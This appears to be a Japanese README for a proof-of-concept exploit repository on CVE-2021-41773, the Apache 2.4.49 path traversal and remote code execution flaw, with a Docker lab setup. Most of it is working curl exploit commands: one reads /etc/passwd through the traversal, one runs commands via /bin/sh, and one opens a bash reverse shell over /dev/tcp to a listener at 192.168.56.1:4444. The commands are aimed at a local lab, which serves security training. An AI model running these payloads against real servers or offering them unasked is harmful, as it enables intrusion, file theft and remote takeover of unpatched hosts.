
Apache 2.4.49 パストラバーサル RCE
| 項目 | 詳細 |
|---|
| CVE ID | CVE-2021-41773 |
| CVSS | 9.8 CRITICAL |
| 影響を受けるバージョン | Apache HTTP Server 2.4.49 のみ |
| 種別 | パストラバーサル + リモートコード実行 |
| 修正バージョン | Apache 2.4.51 |
| ファイル | 説明 |
|---|---|
poc_41773.py | Team Zetaバナー付きPython PoCエクスプロイトスクリプト |
docker-compose.yml | 脆弱性のあるラボ環境のセットアップ |
offensive_zeta_shell.txt | ライブセッションログ — エクスプロイトの証拠 |
screenshots/ | 証拠スクリーンショット |
Offensive_Team_Zeta_FINAL_Report.pdf | 完全なエクスプロイトレポート |
# 脆弱性のあるイメージを取得
sudo docker pull blueteamsteve/cve-2021-41773:with-cgid
# ラボを起動
docker-compose up -d
# Apache 2.4.49が実行中であることを確認
curl -I http://localhost:8080/
# 表示されるべき内容: Server: Apache/2.4.49
# パストラバーサルによるファイル読み取り
curl --path-as-is \
'http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd'
# リモートコード実行
curl --path-as-is \
-d 'echo Content-Type: text/plain; echo; id' \
'http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'
# リバースシェル(IPを自分のマシンのIPに置き換えてください)
curl --path-as-is \
-d "echo Content-Type: text/plain; echo; bash -c 'bash -i >& /dev/tcp/192.168.56.1/4444 0>&1'" \
"http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh"